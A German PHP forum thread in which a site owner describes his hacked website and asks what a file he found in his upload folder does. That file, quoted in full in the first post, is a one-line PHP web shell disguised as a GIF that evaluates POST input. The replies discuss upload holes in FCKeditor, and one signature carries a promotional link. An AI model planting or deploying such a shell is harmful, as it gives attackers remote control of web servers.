SELFPHP: Version 5.8.2 Befehlsreferenz - Tutorial – Kochbuch – Forum für PHP Einsteiger und professionelle Entwickler

SELFPHP


Professional CronJob-Service

Suche



CronJob-Service    
bei SELFPHP mit ...



 + minütlichen Aufrufen
 + eigenem Crontab Eintrag
 + unbegrenzten CronJobs
 + Statistiken
 + Beispielaufrufen
 + Control-Bereich

Führen Sie mit den CronJobs von SELFPHP zeitgesteuert Programme auf Ihrem Server aus. Weitere Infos



:: Buchempfehlung ::

Einführung in XHTML, CSS und Webdesign

Einführung in XHTML, CSS und Webdesign zur Buchempfehlung
 

:: Anbieterverzeichnis ::

Globale Branchen

Informieren Sie sich über ausgewählte Unternehmen im Anbieterverzeichnis von SELFPHP  

 

:: Newsletter ::

Abonnieren Sie hier den kostenlosen SELFPHP Newsletter!

Vorname: 
Name:
E-Mail:
 
 

Zurück   PHP Forum > SELFPHP > PHP für Fortgeschrittene und Experten

PHP für Fortgeschrittene und Experten Fortgeschrittene und Experten können hier über ihre Probleme und Bedenken talken

Antwort
 
Themen-Optionen Ansicht
  #1  
Alt 28.12.2014, 13:37:18
Heinrich Heinrich ist offline
Member
 
Registriert seit: Feb 2006
Beiträge: 883
Seite gehackt

Hallo,

ich habe lange beim Webseitenbasteln pausiert, bis ich vom Provider eine Mitteilung bekam, dass meine Seite auf einer Liste des BSI mit gehackten Webseiten steht. Ging um SQL-Injection. Also - die letzten Tage mehr Sicherungen eingebaut (URL-Parameter kontrollieren usw) und hoffen, dass es jetzt dicht ist...

Jetzt zwei Fragen:

1. In den userfiles fand ich fremde php-Dateien mit dem einzigen Inhalt
PHP-Code:
GIF89a?lovealihack <?php eval($_POST[alihackxx])?>
Was eval() ist, weiß ich. Aber was macht man mit so'ner Datei?

2. Mein Eindruck ist, dass das "Loch" in der Webseite beim FCKeditor war. (Der ist Bestandteil meines CMS). Hat jemand Erfahrung mit Sicherheitslücken bei Webeditoren und eine Empfehlung? (Werde parallel mal googeln).

Danke schon mal für Tipps!
Mit Zitat antworten
  #2  
Alt 30.12.2014, 10:04:08
Heinrich Heinrich ist offline
Member
 
Registriert seit: Feb 2006
Beiträge: 883
AW: Seite gehackt

Na, keine Reaktion...

Dann kurz die googel-Ergebnisse:
Auf vielen (z.T. älteren) Webseiten wird berichtet, dass sowohl der FCKeditor als auch Xinha bei den Uploadmanagern Sicherheitslücken haben. Von Schadensbehebung war nix zu lesen.

Dann arbeite ich lieber mit einem Editor ohne Upload-Funktion und mache den über eigene Scripts (die kann ich wenigstens kontrollieren).

a) Was ist eure Meinung dazu?
b) interessiert das hier jemand (mag nicht in die dunkle Nacht posten)?
Mit Zitat antworten
  #3  
Alt 06.01.2015, 09:37:57
richti007 richti007 ist offline
Anfänger
 
Registriert seit: Dec 2014
Alter: 43
Beiträge: 3
AW: Seite gehackt

Ich benutze nur eigene Scripts. Ich hatte gleiche Probleme mit FCKeditor. Es ist nicht schwer um solche Script zu schreiben.
__________________
Meiner VisitX EarForce Seite : http://www.px24-tb.com/visitx-plattform/
Mit Zitat antworten
  #4  
Alt 06.01.2015, 10:03:47
Heinrich Heinrich ist offline
Member
 
Registriert seit: Feb 2006
Beiträge: 883
AW: Seite gehackt

Hi, ich dachte schon, hier sind alle noch von Silvester versackt -:))

Ich habe was zum Upload von Bildern geschrieben und hier gepostet:
http://www.selfphp.de/forum/showthread.php?t=25465
Hat aber noch niemand was dazu gesagt.
Mit Zitat antworten
Antwort

Stichworte
fckeditor, seitenhack


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind aus.
[IMG] Code ist aus.
HTML-Code ist aus.

Gehe zu

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
PHP script: Dynamische Seitenanvigation - Seite 1 von n Pukedragon PHP Grundlagen 1 02.03.2014 21:33:57
Mit cookies zurück zur letzten Seite qwertzy PHP Grundlagen 8 03.10.2006 22:45:38
HTML Quelltext einer mit php Seite erzeugten Seite in .txt oder MySQL speichern. Berentzen PHP Grundlagen 2 14.06.2006 12:36:11
Ausgabe auf mehreren Seiten. Nicht Link zu jeder Seite, sondern mit [...] arbeiten? DieMilchMachts PHP Grundlagen 0 14.11.2005 20:45:44
Daten aus Textdatei auf einer HTML oder PHP Seite ausgeben Max_04 PHP Grundlagen 10 16.05.2005 12:53:35


Alle Zeitangaben in WEZ +2. Es ist jetzt 12:44:13 Uhr.


Powered by vBulletin® Version 3.8.3 (Deutsch)
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


© 2001-2024 E-Mail SELFPHP OHG, info@selfphp.deImpressumKontakt